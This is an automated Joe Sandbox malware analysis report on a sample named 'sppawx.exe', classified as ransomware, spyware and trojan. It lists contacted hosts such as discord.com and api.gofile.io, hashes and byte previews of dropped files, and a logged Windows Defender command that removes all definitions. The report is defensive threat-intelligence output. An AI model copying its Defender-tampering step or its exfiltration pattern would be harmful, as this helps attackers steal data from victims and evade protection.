                                                                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_specsppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://github.com/urllib3/urllib3/issues/2920sppawx.exe, 00000002.00000003.1517272348.0000018C7F6B9000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452098509.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748973373.0000018C7F6BA000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_datasppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://yahoo.com/sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617193305.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1484130042.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1515784101.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1450803284.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1495682186.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F727000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1465225633.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              https://account.bellmedia.csppawx.exe, 00000002.00000002.1746430268.0000018C02544000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6sppawx.exe, 00000002.00000002.1748349929.0000018C7F296000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  https://login.microsoftonline.comsppawx.exe, 00000002.00000002.1746430268.0000018C025D8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    http://cacerts.digicert.cosppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      http://crl.thawte.com/ThawteTimestampingCA.crl0sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        https://html.spec.whatwg.org/multipage/sppawx.exe, 00000002.00000003.1517272348.0000018C7F6B9000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452098509.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748973373.0000018C7F6BA000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://www.ifeng.com/sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warningssppawx.exe, 00000002.00000002.1745991860.0000018C01D70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://www.zhihu.com/sppawx.exe, 00000002.00000002.1746430268.0000018C02560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://www.rfc-editor.org/rfc/rfc8259#section-8.1sppawx.exe, 00000002.00000003.1451486952.0000018C7F704000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1744930553.0000018C01430000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    https://contoso.com/powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      https://oneget.orgXpowershell.exe, 00000044.00000002.1539735870.000001AF3DD64000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        http://crl.comodxsppawx.exe, 00000002.00000002.1748973373.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1744275263.0000018C7F726000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          https://api.gofile.io/getServersppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                            208.95.112.1
                                                                                                                                                                                                                            ip-api.comUnited States
                                                                                                                                                                                                                            53334TUT-ASUStrue
                                                                                                                                                                                                                            162.159.135.232
                                                                                                                                                                                                                            discord.comUnited States
                                                                                                                                                                                                                            13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                            Analysis ID:1574325
                                                                                                                                                                                                                            Start date and time:2024-12-13 08:37:00 +01:00
                                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                            Overall analysis duration:0h 13m 21s
                                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                            Number of analysed new started processes analysed:125
                                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                                            • HCA enabled
                                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                                            Sample name:sppawx.exe
                                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                                            Classification:mal100.rans.troj.adwa.spyw.expl.evad.winEXE@198/57@4/2
                                                                                                                                                                                                                            EGA Information:
                                                                                                                                                                                                                            • Successful, ratio: 50%
                                                                                                                                                                                                                            HCA Information:
                                                                                                                                                                                                                            • Successful, ratio: 88%
                                                                                                                                                                                                                            • Number of executed functions: 143
                                                                                                                                                                                                                            • Number of non-executed functions: 175
                                                                                                                                                                                                                            Cookbook Comments:
                                                                                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 172.217.19.227, 13.107.246.63, 20.12.23.50
                                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                            • Execution Graph export aborted for target mshta.exe, PID 8124 because there are no executed function
                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 7596 because it is empty
                                                                                                                                                                                                                            • Execution Graph export aborted for target powershell.exe, PID 8072 because it is empty
                                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                            • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                            • VT rate limit hit for: sppawx.exe
                                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                                            02:37:59API Interceptor8x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                                            02:38:00API Interceptor116x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                            02:38:53API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            No context
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:@...e...........................................................
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):675537
                                                                                                                                                                                                                            Entropy (8bit):7.922831844016598
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:0128IF8B5PaYu4fkBmXrwbPF/dgA3nOotevoVvd6q6PbDJErO:0AtmN7kbPF/dgA3eQVvmvj
                                                                                                                                                                                                                            MD5:3E9E7A98499486C6B4D4DC267014DD2A
                                                                                                                                                                                                                            SHA1:E969F27F10D6D160471F8071514FED41F711A453
                                                                                                                                                                                                                            SHA-256:1E771486D47AC8217D2592793ACEFE72FBC0129147583115E5DDE64D425F6557
                                                                                                                                                                                                                            SHA-512:6C29373E74DD1341C7061B78001358D88DA52D5F4092EE98EC0EEBD52927573CDDC355979B73845F5C7BDE226D991F0B000CCB3445563E65D2B5A3E79E240A9F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.....Wy..Fd.,.j....}.m.t.s.v......+.`....y... f..'3..T .1Ib..`.A..<.3.@.y(..Y........;......D.Z..{..wDf.A....w:.>.&..xd.9wL.E[..:.t..8t...........|.{..=....n.^.d1.t......R.3...+6.t.t?.0:.z`AL........O.I.wNL.)..J..|.....?..;...zt?...{l.t>z......~xC....~...1.......9Q....XLUt.{.........}.,..u(S..y...#.9...~K...n....4/.oY...91........e.b.oo..?3.0..\...o..e...Y.....8...2....\W.~u..W...b.^s}...Z.z..C.m.Z._O.S..f....e......Nw.U...+..&-[{.,._~Ua.eW....U.9..e..s.`...C.H..e..<...s|:.g*......,.Y>.....}.e...^zy.[......./.4M...s."...-?...[......r.0..{..ij.KRw..Sg.......cZ.....tyZ.kV.q9.\...<..}A....t........XC...{qZ._>....>9.....^...U.^.V....s.e\.o.O>w..Rw...8.W.>{._.........b..Yy..qN.[..e.....^Fb.W.uE....u~..Vl.....{.[`....#.w....S..]....&.9....+.u.v...?..s..Ng..........xV...sX.k>....r.g...9....v.u;...w....T'...r.v....z.mNK...,u...(1....,r
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe
                                                                                                                                                                                                                            File Type:RAR archive data, v5
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):692670
                                                                                                                                                                                                                            Entropy (8bit):7.999787043646737
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:12288:0ZBSWI4oWwqo/Kc8MX9rqNVVU0VvMnoUt4dQif1zMLIydp/CLm4COKBchvKyAm+:OMAoWwqo/Tb9r70VvQFt4d9f1GIydl6k
                                                                                                                                                                                                                            MD5:C3D4563DCF5A4009AE8791ADA9F5218B
                                                                                                                                                                                                                            SHA1:8290DA0609D2A5B737D2CA8D5F0009896D995B67
                                                                                                                                                                                                                            SHA-256:7F9EADC16FD82073F7508C69D206A7948B99353468494293B56DA4751753FA10
                                                                                                                                                                                                                            SHA-512:331292B831AB4A6BFFB3B930E60D3E7285F16B6CA0FB7B15CFEE2E916D2ED9DB271A906B8C8C37905BA134A82252A20F17EAF5C6E7D3A05A7B9AE744630D17C4
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:Rar!.....e.a!.....Yg.f..9-#(:p...&..."I.../..c.......,]TGh.6.Tn..t.E^..(.K..]{..g.....g=..z[..[n..a.DF.>7..(....jR......t......~}.Sy.*@z.pbw...?.F..t..V9=;?.....'.lq.;..4{....__....A.,..o.`......9...) .&.Z......d..Xk.%..`R...Y.....R...S...=.....'..JU.%..X.@..\V...F...T.D..~...a.d..........t@.>.....U......f.7R?....*j...yn~....0.[..h.+...../..E..).(..U}vb5....H1st..)...r..1....W.....JQr....mL..!..l.........9Hm...:_+K,.......<......z B.x3..deQ..<..<..Z+D..s...O.iF8....30.U..OE.7/o......~....d.....Q..D.C..%{...Sr.4<...l.5.g.<.4.J......0..b..wgd.P.{.....K..v.87yxP..C......:.......1.V!.$.G..G&{-.ql.\...JH..-v!.Vz.&5.U.r.....o..W...G(o=.,..).T2I.E8.C.......P.-......R9v...........d.~....Z.n.R.S.]..........z.l.z^.j.t..`.Xhx.S..P.P....u.#&P./...Q..p.8.....$..qRu.u.Q...+.G\.....P.G.....h....BY.d.Y.....;."1N.@....4..Y...7.....x...7..7R....!!`q....2..l[S\8...h(A.F......PA....wY1..<.+......O'...{W.3..[...G7.....7...e...K&....?...e........Q.].W.....3..2..&A...
                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):894
                                                                                                                                                                                                                            Entropy (8bit):3.107468882489664
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:Q58KRBubdpkoPAGdjrN7K/Ubk9+MlWlLehW51IC07K/U2:QOaqdmOFdjrc/Z+kWResLIE/z
                                                                                                                                                                                                                            MD5:3DFEAE2098C9C549BC76F897D88942D8
                                                                                                                                                                                                                            SHA1:0CE43BF38FC7AD2EF780DF2278345ECB9B4941AB
                                                                                                                                                                                                                            SHA-256:DB14EDEB6E83C80719CF4D3B88B185FAE13BF9AB9F412D6CD4E7C5CDEF7D9B15
                                                                                                                                                                                                                            SHA-512:B4EC29062C2530DF420F6E825B36A573671CC95885BFAD8BDCD7251DD5379711B4FEC777A8D58F050EE95C4FE0828B48B117A6CC9EEEF8743EE72A48481A6F77
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.3.8.:.1.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.3.8.:.1.0.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Fri Dec 13 09:06:02 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1372
                                                                                                                                                                                                                            Entropy (8bit):4.125121102328959
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:HXGFq9sWc5LSUTcH8FwK2cnKNII+ycuZhNtakSbPNnqS+d:3GnctcmKdnKu1ulta3RqSe
                                                                                                                                                                                                                            MD5:387CBC0925ECEC3EB79E8A6B510AF49E
                                                                                                                                                                                                                            SHA1:A82EB7064BDD5E299DDD3339473D9F6B9488B827
                                                                                                                                                                                                                            SHA-256:DD817D0311237A5495C4BD3E678273AC93B65AD55E8ABB64D1EBE7930BBFA938
                                                                                                                                                                                                                            SHA-512:603B4DDB40FCDD00E8C99D81EB4FD3C1D087E8E40F6C35C8675FCC306F38E1CB881846B6B40ED640C39D0E6BDBD4FFE2AB7C10547723BAFA1A9541E6BC05B588
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:L.....[g.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........T....c:\Users\user\AppData\Local\Temp\vebzhwcp\CSCD4517BE1E6C4428293E27562A6116680.TMP................Dq.N(P|..oTu.............4.......C:\Users\user\AppData\Local\Temp\RESA7D9.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.e.b.z.h.w.c.p...d.l.l.....(.....L.e.g.a.
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):109392
                                                                                                                                                                                                                            Entropy (8bit):6.641929675972235
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                                                                                                                                                                            MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                                                                                                                                                                            SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                                                                                                                                                                            SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                                                                                                                                                                            SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):49944
                                                                                                                                                                                                                            Entropy (8bit):7.78315600372484
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:U/onT0xi3xXtfwYf5CVW3Bd7IGCVwU7SyixL7:U/k538e5CIRlIGCVwUO7
                                                                                                                                                                                                                            MD5:85C70974FAC8E621ED6E3E9A993FBD6F
                                                                                                                                                                                                                            SHA1:F83974E64AA57D7D027B815E95EBD7C8E45530F1
                                                                                                                                                                                                                            SHA-256:610983BBCB8EE27963C17EAD15E69AD76EC78FAC64DEB7345CA90D004034CDD6
                                                                                                                                                                                                                            SHA-512:142792750E4A5189DBEAA710E3F5B3689D593927EA77DED00EB5CAADA6B88D82A37459770845F1EA7C9F45DA5A6AE70E19BFCF76D9F1A56184C3164B736BCB18
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.l.3...3...3...:...9......1......0......>......;......7.......0...x...1...3...l.......;.......2.......2.......2...Rich3...................PE..d...f..e.........." ...#.............e....................................................`.............................................H.................... ..,...................................................q..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60696
                                                                                                                                                                                                                            Entropy (8bit):7.822236524949101
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:WbK/YBHE2gCtX+/9zyeoVIkwLMzKep8z+IGLPAt7SyWxU:WGAK2ghtGIk6MeeGyIGLPAtz
                                                                                                                                                                                                                            MD5:E7EF30080C1785BAF2F9BB8CF5AFE1B2
                                                                                                                                                                                                                            SHA1:B7D7D0E3B15DE9B1E177B57FD476CECBDD4FCB79
                                                                                                                                                                                                                            SHA-256:2891382070373D5070CB8FD6676AFC9F5EB4236251F8FC5C0941AF0C53A2D31E
                                                                                                                                                                                                                            SHA-512:C2EC431D2821879BB505D8ECA13FA3921DB016E00B8674FA62B03F27DC5CEE6DD0DE16BA567D19D4B0AF9A5CB34D544383A68CC63FF2FA9D8BB55E356D0D73E6
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>...z.z.z.s...|....x....v....r....~.....x.1...{.1...|.....y.z.......|.....{...o.{.....{.Richz.................PE..d...c..e.........." ...#.............-.......................................P............`.........................................HL.......I.......@.......................L.......................................9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):108312
                                                                                                                                                                                                                            Entropy (8bit):7.9301662560961494
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:HnHQe/FKYjTnmuJkv4D5ZIBGeKHC6ajQ6BWIGOqmbtbb9:HnHQe/MYjTnDJRX6Ge16ehbhx
                                                                                                                                                                                                                            MD5:3923E27B9378DA500039E996222FFEE6
                                                                                                                                                                                                                            SHA1:A9280559A71ABF390348E1B6A0FB1F2409649189
                                                                                                                                                                                                                            SHA-256:0275B03041F966E587D1C4C50266C3FDFF1E1A65F652AD07B59CB85845B5457E
                                                                                                                                                                                                                            SHA-512:051C613403FD80B9582DD48C1F38870CB26846D54B75603EA52A78202A72272107E95750DE78CD8F6C56951EBDE501B4892D90FB306326B86124C8CC97BCA594
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.R.!...!...!...Y=..!..+]...!..+]...!..+]...!..+]...!..M\...!...Y...!...!...!..M\...!..M\...!..M\...!..M\Q..!..M\...!..Rich.!..........PE..d...T..e.........." ...#.p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................@...........................................UPX0....................................UPX1.....p.......f..................@....rsrc........ .......j..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\sppawx.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):36120
                                                                                                                                                                                                                            Entropy (8bit):7.670480771561197
                                                                                                                                                                                                                            Encrypted:false
